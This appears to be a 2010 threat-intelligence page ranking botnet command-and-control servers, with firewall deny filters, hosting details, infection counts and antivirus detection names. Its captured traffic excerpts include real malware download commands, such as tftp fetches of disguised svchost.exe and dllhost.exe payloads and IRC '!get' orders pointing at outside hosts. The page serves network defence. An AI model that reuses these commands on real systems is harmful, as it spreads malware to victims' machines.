Download our list of the most observed botnet command and control server IP addresses.

Most Prolific BotNet Command and Control Servers and Filters

Tue Feb 9 08:47:03 2010

10 Day Filter Set      30 Day Filter Set      

Priority 100
TCP Ports: 80 80 218 80 91 80 88
Filter: deny ip host 213.219.245.212 any log ! 438 infects 08/13/09 to 02/08/10
Domain: eastweb.ru
ISP: hosting and colocation services
Clients: 438 (russian federation)
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 87.250.57.232:8138
  • Server: GET /index.php?id=txphhhxqqjawgik&scn=0&inf=0&ver=20&cnt=USA...

BotClient Antivirus Diagnoses
AhnLab-V3: Korgo.9359.B
AntiVir: Korgo.X
Authentium: Korgo.W
Avast: _Korgo-T
AVG: Padobot.W
BitDefender: Korgo.W
CAT-QuickHeal: Korgo.X
ClamAV: Korgo.Y
DrWeb: Lsabot
eSafe: Padobot.gen
eTrust-Vet: Korgo.AB
Ewido: Dropper.Paradrop.a
FileAdvisor: MISSED
Fortinet: Korgo.K!worm
F-Prot: Korgo.W
F-Secure: Padobot.gen
Ikarus: Korgo.K
Kaspersky: Padobot.gen
McAfee: Korgo.ab
Microsoft: Korgo.AB
NOD32v2: Korgo.Y
Norman: Korgo.Y
Panda: Korgo.AY.worm
Prevx1: KORGO.W
Rising: Korgo.x
Sophos: Korgo-K
Sunbelt: MISSED
Symantec: Korgo.X
TheHacker: Korgo(2).gen.pack
TrendMicro: MISSED
VBA32: Padobot.gen
VirusBuster: Korgo.AB
Webwasher-Gateway: Korgo.X

Priority 100
TCP Ports: 2081 9890 9890 66
Filter: deny ip host 66.252.13.214 any log ! 204 infects 08/14/09 to 11/03/09
Domain: louisianadynamics.com
ISP: gigenet
Clients: 204 (united states)
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR Win15763.exe
  • Client: NICK F-olmgmodqUSER F-olmgmodq 0 0 :F-olmgmodq
  • Server: :211.cpe.netcabo.uk NOTICE AUTH :*** Looking up your...
  • Client: JOIN ##S## J
  • Server: :F-olmgmodq!F-olmgmodq@192.168.1.172 JOIN...
  • Client: USERHOST F-olmgmodqJOIN ##S## JUSERHOST F-olmgmodqJOIN ##S##...

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.variant
AntiVir: TRCrypt.TPM.Gen
Authentium: Heuristic-210!Eldorado
Avast: MISSED
AVG: RBot.DN
BitDefender: MemScan_Backdoor.RBot.XYL
CAT-QuickHeal: Black.a
ClamAV: Packed-142
DrWeb: Packed.650
eSafe: MISSED
eTrust-Vet: ForBot.WP
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Packed.2D18!tr
F-Prot: Heuristic-210!Eldorado
F-Secure: Kolab.arp
Ikarus: Kolab
Kaspersky: Kolab.arp
McAfee: MISSED
Microsoft: Wootbot.gen
NOD32v2: MISSED
Norman: Malware.DQWL
Panda: MISSED
Prevx1: MISSED
Rising: Undef.blt
Sophos: MalGeneric-A
Sunbelt: Kolab.arp
Symantec: Spybot.Worm
TheHacker: Behav-Heuristic-064
TrendMicro: BKDR_SDBOT.FOG
VBA32: Wootbot
VirusBuster: Agobot.WPUZ
Webwasher-Gateway: MISSED

Priority 100
TCP Ports: 65520 65520 68 65520 193 65520 218
Filter: deny ip host 88.198.228.238 any log ! 123 infects 12/04/09 to 02/03/10
Domain: your-server.de
ISP: hetzner
Clients: 123 (germany)
Chatter Example
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: NICK yaapulwgUSER k020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :u. PRIVMSG yaapulwg :!get...
  • Client: GET /inst.php?id=32&sid=0 HTTP/1.0User-Agent: DownloadHost:...
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: TRFraudPack.aefn
Authentium: MISSED
Avast: _Malware-gen
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: FraudPack.aefn
ClamAV: MISSED
DrWeb: Fakealert.8143
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: FraudPack.AEFN!tr
F-Prot: MISSED
F-Secure: Suspicious_Malware!Gemini
Ikarus: FakeAV
Kaspersky: FraudPack.aefn
McAfee: Suspect-1B!357486DAE775
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: TrjZlob.KH
Prevx1: MISSED
Rising: MISSED
Sophos: MalEncPk-KH
Sunbelt: Generic!BT
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: DR.Agent.RFTA
Webwasher-Gateway: MISSED

Priority 97
TCP Ports: 3305
Filter: deny ip host 92.240.234.164 any log ! 94 infects 09/07/09 to 02/08/10
Domain: lightstorm.sk
ISP: lightstorm communications s.r.o
Clients: 94 (slovakia)
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 211.20.222.150 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 211.20.222.150 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|mzlofyw7bUSER hpgbpr6lj * 0 :USA|2K|669
  • Server: :hub.2702.net 001 P|mzlofyw7b...
  • Client: USERHOST P|mzlofyw7b
  • Server: :hub.2702.net 302 P|mzlofyw7b...
  • Client: USERHOST P|mzlofyw7bMODE P|mzlofyw7b JOIN #mm RSA
  • Client: PRIVMSG #mm...

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.Gen
AntiVir: TRATRAPS.Gen
Authentium: MISSED
Avast: _DCom-F
AVG: SHeur2.AOLW
BitDefender: Generic.Mydoom.F72197F1
CAT-QuickHeal: Agent.gen
ClamAV: MISSED
DrWeb: HLLW.Piabot.origin
eSafe: MISSED
eTrust-Vet: IRCBot.PJ
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Kolabc.gza
Ikarus: Exploit.MS06040
Kaspersky: Kolabc.gza
McAfee: Spybot.worm!l
Microsoft: Exploit_MS06040.gen
NOD32v2: MISSED
Norman: Atraps.MQB
Panda: TrjCI.A
Prevx1: MISSED
Rising: MISSED
Sophos: MalBehav-004
Sunbelt: MISSED
Symantec: Spybot.Worm
TheHacker: MISSED
TrendMicro: SPYBOT.BIM
VBA32: MISSED
VirusBuster: RBot.Gen.3
Webwasher-Gateway: MISSED

Priority 90
TCP Ports: 65520 65520 91 65520 213
Filter: deny ip host 218.93.205.30 any log ! 87 infects 09/09/09 to 12/19/09
Domain: 163data.com.cn
ISP: chinanet jiangsu province network
Clients: 87 (china)
Chatter Example
  • Server: GET /include/lib.js HTTP/1.0Accept: */*Referer:...
  • Server: GET /dspa/hcimages/nonadult/generic_search/main.jpg...
  • Client: NICK xmpunysoUSER a020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :u. PRIVMSG xmpunyso :!get http:/pozemle.cn/in/so.txt:u. PRIVMSG...
  • Server: GET /in/so.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding:...
  • Server: GET /hc3.asp HTTP/1.1Accept: */*Accept-Language:...
  • Server: GET /include/lib.js HTTP/1.1Accept: */*Referer:...
  • Server: GET /hb.asp HTTP/1.1Accept: */*Referer:...
  • Server: GET...
  • Server: GET /onexit.asp HTTP/1.1Accept: */*Referer:...
  • Server: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET...
  • Server: GET /blank.htm HTTP/1.1Accept: */*Referer:...
  • Server: GET /hb.asp HTTP/1.1Accept: */*Referer:...
  • Server: GET /onexit.asp HTTP/1.1Accept: */*Referer:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /?param1={KeyWord:Oakland%20Material%20Handling}...
  • Server: + 1) == (name + '=')) { cookieValue =...
  • Server: PONG :i.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: Momibot
Kaspersky: MISSED
McAfee: MISSED
Microsoft: Momibot.gen!B
NOD32v2: MISSED
Norman: MISSED
Panda: TrjCI.A
Prevx1: MISSED
Rising: Generic.51F24BA7
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority 59
TCP Ports: 65520 65520 88 65520 218
Filter: deny ip host 193.104.94.11 any log ! 57 infects 11/05/09 to 01/31/10
Domain: ipaper.com
ISP: block for pi assignments
Clients: 57 (united kingdom)
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 110.14.214.164 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 110.14.214.164 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK muyzvqvrUSER w020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :u. PRIVMSG muyzvqvr :!get...
  • Client: GET /erdown.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /erku.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /p1023/2.0/d.bin?pw1022161323 HTTP/1.0Accept: */*User-Agent:...
  • Server: GET /portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: GET /files/logo.gif HTTP/1.0Accept: */*Referer:...
  • Server: GET /us/portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: GET /us/portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: TRClick.VB.dic
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: Trojan-Clicker.VB.dic
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority 48
TCP Ports: 65520 65520 218
Filter: deny ip host 91.212.220.75 any log ! 47 infects 09/11/09 to 10/30/09
Domain: -
ISP: group vertical ltd
Clients: 47 (russian federation)
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 116.126.26.100 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 116.126.26.100 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK xdsexzfyUSER k020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :k. PRIVMSG xdsexzfy :!get http:/gidromash.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: DownLoad.47549
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Suspicious_Malware!Gemini
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority 35
TCP Ports: 65520 65520 83
Filter: deny ip host 218.93.201.51 any log ! 34 infects 12/26/09 to 02/08/10
Domain: 163data.com.cn
ISP: chinanet jiangsu province network
Clients: 34 (china)
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 110.12.207.146 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 110.12.207.146 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK qnqaacxfUSER t020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :u. PRIVMSG qnqaacxf :!get...
  • Client: GET /inst.php?id=32&sid=0 HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /erdown.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /erku.txt?t=0.6612011 HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /sv/pm.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /winrar.exe?t=0.5138667 HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /w.txt?t=0.5894679 HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET /banner.exe?t=0.774838 HTTP/1.0User-Agent: Mozilla/4.0...
  • Server: GET / HTTP/1.0Accept: */*Accept-Language: en-usReferer:...
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: TRCrypt.ULPM.Gen
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: VirTool.DelfInject.gen!X.4
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Suspicious_Malware!Gemini
Ikarus: Sopiclick
Kaspersky: MISSED
McAfee: MISSED
Microsoft: Sopiclick.A
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MalGeneric-A
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: SScope.Trojan-Downloader.072
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority 26
TCP Ports: 16667
Filter: deny ip host 66.252.13.212 any log ! 26 infects 08/23/09 to 11/13/09
Domain: louisianadynamics.com
ISP: gigenet
Clients: 26 (united states)
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR Tracker.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK [USA]2K-SP2[00]8493USER ygaci 0 0...
  • Server: NICK [USA]2K-SP2[00]6761USER jutcf 0 0...
  • Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your...
  • Client: USERHOST [USA]2K-SP2[00]6761
  • Client: MODE [USA]2K-SP2[00]6761 -x+iJOIN #l# lamUSERHOST...
  • Server: PONG :mi67.three.co.lt
  • Client: JOIN #l# lam
  • Server: PONG :mi67.three.co.lt
  • Client: JOIN #l# lam
  • Server: NICK [USA]2K-SP2[00]0046USER etbtll 0 0...
  • Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your hostname...
  • Server: :mi67.three.co.lt NOTICE AUTH :*** Couldn't resolve your...
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Client: USERHOST [USA]2K-SP2[00]0046
  • Client: MODE [USA]2K-SP2[00]0046 -x+iJOIN #l# lamUSERHOST...
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Server: PONG :mi67.three.co.ltJOIN #l# lam
  • Server: PONG :mi67.three.co.ltJOIN #l# lam

BotClient Antivirus Diagnoses
AhnLab-V3: Virut.B
AntiVir: Virut.AX
Authentium: Backdoor2.DKQM
Avast: _Virtob
AVG: Virut
BitDefender: Generic.127971
CAT-QuickHeal: Virut.Z
ClamAV: Virut-54
DrWeb: HLLW.MyBot
eSafe: MISSED
eTrust-Vet: Virut.7115
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.AV
F-Prot: Backdoor2.DKQM
F-Secure: Virut.av
Ikarus: VirTool.DelfInject
Kaspersky: Virut.av
McAfee: Virut.gen.a
Microsoft: Virut.AC
NOD32v2: MISSED
Norman: Agent.LSMS
Panda: Virutas.FG
Prevx1: MISSED
Rising: Mnless.akf
Sophos: Virut-W
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.av
TrendMicro: PE_VIRUT.AV
VBA32: Virut.2
VirusBuster: Virut.Gen.4
Webwasher-Gateway: MISSED

Priority 23
TCP Ports: 4545 8585
Filter: deny ip host 69.42.218.70 any log ! 23 infects 12/01/09 to 12/10/09
Domain: likeacyb.org
ISP: awknet communications llc
Clients: 23 (united states)
Chatter Example
  • Client: USER mmsnbl mmsnbl mmsnbl :zrgsgbcjtqojqmvg
  • Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
  • Client: NICK gLMYNsE
  • Server: :irc.priv8net.com NOTICE AUTH :*** Couldn't resolve your...
  • Client: MODE gLMYNsE +xi
  • Client: JOIN ##nerds## USERHOST gLMYNsE
  • Server: :gLMYNsE!mmsnbl@28B83DC7.401D014A.D1CD3454.IP JOIN...
  • Client: MODE ##NERDS## +smntu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: MISSED
Kaspersky: MISSED
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority 22
TCP Ports: 7000
Filter: deny ip host 87.118.98.185 any log ! 22 infects 09/01/09 to 09/04/09
Domain: keymachine.de
ISP: keyweb ag ip network
Clients: 22 (germany)
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR coder.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK USA|00|XP|SP0|0204612USER wxvkwzjqc 0 0...
  • Server: :irc.oc256.com NOTICE AUTH :*** Looking up your...
  • Server: :irc.oc256.com NOTICE USA|00|XP|SP0|0204612 :*** If you are...
  • Server: PONG :DD5EF013
  • Client: JOIN ##nzm##
  • Client: USERHOST USA|00|XP|SP0|0204612MODE USA|00|XP|SP0|0204612 -x+iJOIN...
  • Client: PRIVMSG ##nzm## :\002n\002z\037m\037 (root.p\037l\037g)...

BotClient Antivirus Diagnoses
AhnLab-V3: Win-Agent.20480.AJY
AntiVir: TRDropper.Gen
Authentium: MISSED
Avast: MISSED
AVG: Dropper.Generic.AVFT
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: Poison.767
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: MISSED
Ikarus: Trojan-Ransom
Kaspersky: Trojan-Ransom.SMSer.in
McAfee: MISSED
Microsoft: VirTool_Injector.gen!Y
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MISSED
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: Rbot.afvq
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority 17
TCP Ports: 6900
Filter: deny ip host 78.155.216.238 any log ! 17 infects 09/29/09 to 09/30/09
Domain: -
ISP: mostelecom-customer
Clients: 17 (russian federation)
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR utilmgr.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK Gleason211USER xaqrn 0 0 :Gleason211
  • Server: :fart.bitchassness.shit NOTICE Gleason211 :*** If you are having...
  • Server: PONG :4FE4D7D7
  • Client: JOIN ##!X4
  • Client: USERHOST Gleason211MODE Gleason211 -x+iJOIN ##!X4 USERHOST...

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: IRCBackDoor.SdBot4.NNI
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Kolab.eay
Ikarus: Kolab
Kaspersky: Kolab.eay
McAfee: MISSED
Microsoft: MISSED
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MalGeneric-A
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: KOLAB.DW
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority 12
TCP Ports: 6556 6556 194
Filter: deny ip host 194.109.11.65 any log ! 12 infects 09/06/09 to 12/23/09
Domain: xs4all.net
ISP: xs4all ppp _30 router subnets
Clients: 12 (netherlands)
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 74.214.47.11 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 74.214.47.11 get dllhost.exe wins\DLLHOST.EXE
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
  • Client: JOIN #9# g3t0u7
  • Client: MODE tein +i
  • Server: :tein!tein@192.168.1.191 JOIN :#9# g3t0u7
  • Server: :mindleak.com MODE #9# g3t0u7 +nt:mindleak.com 353 tein = #9#...
  • Client: JOIN #9# g3t0u7
  • Server: :tein!tein@192.168.1.191 JOIN :#9# g3t0u7
  • Server: :mindleak.com MODE #9# g3t0u7 +nt:mindleak.com 353 tein = #9#...
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.20959
AntiVir: Codbot.BG
Authentium: Sdbot.LHJ
Avast: _CodBot-P
AVG: Generic.GFM
BitDefender: Codbot.AG
CAT-QuickHeal: MISSED
ClamAV: Stration.QR-1
DrWeb: IRC.Moto
eSafe: Stration
eTrust-Vet: Toxbot.AO
Ewido: Codbot.ag
FileAdvisor: MISSED
Fortinet: SpyBot.ZI!dam
F-Prot: Sdbot.LHJ
F-Secure: Codbot.bn
Ikarus: Codbot.bn
Kaspersky: Codbot.bn
McAfee: Proxy-FBSR
Microsoft: Codbot
NOD32v2: Codbot
Norman: Codbot.BG
Panda: Codbot.BC.worm
Prevx1: MISSED
Rising: Codbot.l
Sophos: MalIRCBot-B
Sunbelt: MISSED
Symantec: Toxbot
TheHacker: BackdoorCodbot.ag
TrendMicro: TROJ_PROXY.DK
VBA32: Codbot.ag
VirusBuster: Codbot.W
Webwasher-Gateway: Codbot.20959

Priority 10
TCP Ports: 65520 65520 91
Filter: deny ip host 91.121.221.157 any log ! 10 infects 08/22/09 to 09/05/09
Domain: -
ISP: fr-ovh
Clients: 10 (france)
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 114.203.72.50 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 114.203.72.50 get dllhost.exe wins\DLLHOST.EXE
  • Client: NICK lejfnledUSER e020500 . . :_
  • Client: Service Pack 2JOIN &virtu
  • Server: :l. PRIVMSG lejfnled :!get http:/gidromash.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/mr.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu

BotClient Antivirus Diagnoses
AhnLab-V3: MISSED
AntiVir: MISSED
Authentium: MISSED
Avast: MISSED
AVG: MISSED
BitDefender: MISSED
CAT-QuickHeal: MISSED
ClamAV: MISSED
DrWeb: MISSED
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: MISSED
F-Prot: MISSED
F-Secure: Suspicious_Malware!Gemini
Ikarus: Hostil
Kaspersky: MISSED
McAfee: MISSED
Microsoft: Hostil.F
NOD32v2: MISSED
Norman: MISSED
Panda: MISSED
Prevx1: MISSED
Rising: MISSED
Sophos: MalEncPk-IF
Sunbelt: MISSED
Symantec: MISSED
TheHacker: MISSED
TrendMicro: MISSED
VBA32: MISSED
VirusBuster: MISSED
Webwasher-Gateway: MISSED

Priority 10
TCP Ports: 3305
Filter: deny ip host 200.49.145.197 any log ! 10 infects 09/04/09 to 01/23/10
Domain: allytech.com
ISP: allytech s.a
Clients: 10 (argentina)
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 173.16.120.174 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 173.16.120.174 get dllhost.exe wins\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|a6xnr2frjUSER a5fik9m7o * 0 :USA|2K|445
  • Server: :hub.49011.net 001 P|a6xnr2frj...
  • Client: USERHOST P|a6xnr2frj
  • Server: :hub.49011.net 302 P|a6xnr2frj...
  • Client: USERHOST P|a6xnr2frjMODE P|a6xnr2frj JOIN #mm RSA

BotClient Antivirus Diagnoses
AhnLab-V3: IRCBot.Gen
AntiVir: TRATRAPS.Gen
Authentium: MISSED
Avast: _DCom-F
AVG: SHeur2.BBMT
BitDefender: Generic.Mydoom.638E6D7B
CAT-QuickHeal: I-Kolabc.gza
ClamAV: MISSED
DrWeb: HLLW.Piabot.4
eSafe: MISSED
eTrust-Vet: MISSED
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Kolabc.GZA!im
F-Prot: MISSED
F-Secure: Kolabc.gza
Ikarus: Kolabc
Kaspersky: Kolabc.gza
McAfee: MISSED
Microsoft: Kolabc.C
NOD32v2: MISSED
Norman: Akbot.BJT
Panda: Gaobot.OXI.worm
Prevx1: MISSED
Rising: Dropper.Undef.GEN
Sophos: MalBehav-104
Sunbelt: Generic!BT
Symantec: Spybot.Worm
TheHacker: MISSED
TrendMicro: KOLABC.GB
VBA32: Kolabc.gza
VirusBuster: RBot.Gen.3
Webwasher-Gateway: MISSED

Priority 9
TCP Ports: 10324
Filter: deny ip host 67.43.236.67 any log ! 9 infects 08/17/09 to 12/28/09
Domain: -
ISP: nader dara
Clients: 9 (lebanon)
Chatter Example
  • Client: dir dllcache\tftpd.exe
  • Client: tftp -i 194.126.184.69 get svchost.exe wins\SVCHOST.EXE
  • Client: tftp -i 194.126.184.69 get dllhost.exe wins\DLLHOST.EXE
  • Client: USER oqrpxi oqrpxi oqrpxi :uwcnesiidwfjpyko
  • Client: NICK gEJwHkFa
  • Client: MODE gEJwHkFa +xi
  • Client: GET /rs3.exe HTTP/1.0Host: nadsamcabran12.com
